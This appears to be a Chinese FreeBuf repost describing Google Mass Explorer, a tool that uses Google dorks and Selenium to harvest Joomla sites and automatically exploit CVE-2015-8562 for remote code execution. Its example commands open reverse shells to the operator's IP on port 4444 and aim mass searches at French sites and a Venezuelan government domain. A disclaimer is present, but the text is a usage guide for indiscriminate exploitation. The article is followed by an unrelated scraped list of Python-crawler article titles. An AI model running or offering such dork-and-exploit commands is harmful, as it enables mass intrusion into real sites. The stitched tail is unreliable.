*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

这是一款基于谷歌搜索引擎的自动化爬虫。

爬虫介绍

爬虫大体机制就是:先进行一次谷歌搜索,将结果解析为特定格式,然后再提供给exp使用。

大家可以尝试使用--help来列出所有参数。

这个项目笔者会持续更新,以后再添加新的exp进行升级。此外,它会利用google_parsers模块去构建exp解析搜索结果,所以当你开始搜索时,可以选择“--exploit parser”参数来指定相应exp。

google parsers模块(google_parsers.py)以后还会继续优化,而现在的exp只含有joomla cve,毕竟这个项目主要是给大家自己diy使用的。但是,如果你不会弄exp,把利用exp提交给过来也行。

由于笔者平时还是比较忙,所以没有太多时间去手动搜索目标。故而,笔者尝试使用Selenium框架去造了个爬虫来搜寻测试目标。至于搜索过程中出现的Google的验证码,它需要其他库和模块来辅助解决。在项目里使用Selenium后,大家就可以在谷歌出现验证码的是时候,自行手动输入验证码,然后爬虫就可以继续爬行了。这大概是笔者能想出的最好的解决验证码防护的办法了。

简单概述下爬虫是如何工作的:1. 执行谷歌搜索

2. 从每一页解析结果

3. 测试是否结果中含有漏洞

依赖与需求

这个项目需要python3,使用requirements安装依赖库的方法如下:$ sudo pip install -r requirements.txt

运行示例:python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"

在上面的例子里,笔者是在寻找法国的joomla RCE目标,使用的是google_domains.txt里面的google域名(比如google.co.uk)来作为搜索引擎,“--last_update”则代表着搜索结果的更新时间为上个月。

上面例子里的选项适用于任何语言,主要决定于google针对相应的国家给出的语法。

下面再给出一个简单的例子:python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"

当然,这些exp也是可以单独使用的:$ cd xpl_parsers

$ python joomla_cve_2015_8562.py

单独测试exp的方法:$ cd exploits

$ python exploiter.py --file

* 参考来源:Github,FB小编dawner编译,转载请注明来自FreeBuf(FreeBuf.COM)

cve 爬虫_好用的Google漏洞爬虫:Google Mass Explorer相关推荐

  1. 为什么用python写爬虫_老猿为什么写Python爬虫教程

    对于"爬虫", 或许你只是听说过,或许已经有所了解.无论怎样,你可能有过这样的困惑: + 学了爬虫不知道怎么挣钱? + 技术不知道如何进阶? + 遇到问题不知道找谁交流? 十多年前 ...

  2. java 有没有类似于 requests 爬虫_广州地震?用 Python 爬虫带你了解地震

    这周看到了两个地震新闻,一个是广东广州增城的,另一个是台湾的,因为本人身在广州,而且对于广佛这边的来说地震其实挺突然的对于我们来说,基本在广佛这边很少出现地震,所以我看到广州增城地震也挺吃惊,然后就萌 ...

  3. python深度爬虫_总结:常用的 Python 爬虫技巧

    用python也差不多一年多了,python应用最多的场景还是web快速开发.爬虫.自动化运维:写过简单网站.写过自动发帖脚本.写过收发邮件脚本.写过简单验证码识别脚本. 爬虫在开发过程中也有很多复用 ...

  4. python简单网络爬虫_【Python】 简单网络爬虫实现

    介绍网络爬虫(英语:网络爬虫),也称为网络蜘蛛(蜘蛛)是一个Web机器人用于自动浏览万维网.其目的通常是为了编译web索引.\u2014\u2014维基百科web爬虫程序可以节省他们访问的页面,以便搜 ...

  5. 手机写python爬虫_零基础开始写Python爬虫心得

    零基础学习爬虫,坑确实比较多,总结如下: 1.环境配置,各种安装包.环境变量,对小白太不友好: 2.缺少合理的学习路径,上来 Python.HTML 各种学,极其容易放弃: 3.Python有很多包. ...

  6. 如何用python实现爬虫_如何用python实现网络爬虫原理?

    对于一个网络爬虫,如果要按广度遍历的方式下载,它就是这样干活的: 1.从给定的入口网址把第一个网页下载下来 2.从第一个网页中提取出所有新的网页地址,放入下载列表中 3.按下载列表中的地址,下载所有新 ...

  7. java 网络爬虫_如何用Java实现网络爬虫

    原标题:如何用Java实现网络爬虫 微信公众号"书圈"后台回复[Javapachong1],下载本例的PPT和源码 作品描述 本章作品是一个能够抓取指定网站ACM比赛信息的爬虫.A ...

  8. python极客学院爬虫_学习极客学院多线程爬虫课程的收获

    昨天开始了极客学院<XPath与多线程爬虫>课程的学习,主要涉及到XPath和requests的使用,在测试过程中出现了很多问题,经过不断摸索以及前辈们的帮助,现将经验总结如下: 1. P ...

  9. 51自学网python爬虫_小白必看的Python爬虫流程

    定义: 网络爬虫(Web Spider),又被称为网页蜘蛛,是一种按照一定的规则,自动地抓取网站信息的程序或者脚本. 简介: 网络蜘蛛是一个很形象的名字.如果把互联网比喻成一个蜘蛛网,那么Spider ...

最新文章

  1. iOS中的两种主要架构及其优缺点
  2. 计算机重启如何进入设置界面,win7电脑无法正常启动,一开机就进入到bios设置界面怎么办?...
  3. maven 热部署 web应用
  4. 使用迁移学习和TensorFlow.js在浏览器中进行AI情感检测
  5. VSCode 个性化配置快捷键
  6. 把DamnSmallLinux(DSL)安装到硬盘(虚拟机)并安装GCC
  7. 电子电路基础 (4)——电阻的认识
  8. 原生开发什么意思_原生app开发是什么意思?
  9. javascript 构造函数方式定义对象 (转载)
  10. 实践练习6:查看 OceanBase 执行计划
  11. No matter what,just do not give up。
  12. python3 英文字母单数转复数
  13. 如何打造3D立体世界?跟随图片一同探寻
  14. 方向导数(Directional derivatives)
  15. html个人中心样式,个人中心.html
  16. caffe学习笔记2:net forward与backward
  17. 单点登陆是什么意思?
  18. 宜信支付结算账户系统浅析
  19. 基于STM32F103的智能门锁系统
  20. 让你写工作总结不用愁,总结的方法套路大全

热门文章

  1. ASP.NET MVC 2示例Tailspin Travel UI层分析
  2. 记录AJAX在VS2005中的使用第二编
  3. PAT甲级1086 Tree Traversals Again:[C++题解]二叉树中序序列、栈、求后序遍历
  4. 2020年余丙森概率统计强化笔记-第一章 随机事件及其概率-第二章 一维随机变量及其分布
  5. 程序设计竞赛算法基础考试真题2020年(回忆版)
  6. IDEA打包成可执行的JAR包
  7. centos7 mysql安装配置_mysql 5.7.17 安装配置方法图文教程(CentOS7)
  8. api质量等级_第1150期 简单又易操作的辨别润滑油质量的方法
  9. linux指令笔试,Linux笔试常用命令
  10. python网页编程测试_李亚涛:python编写友情链接检测工具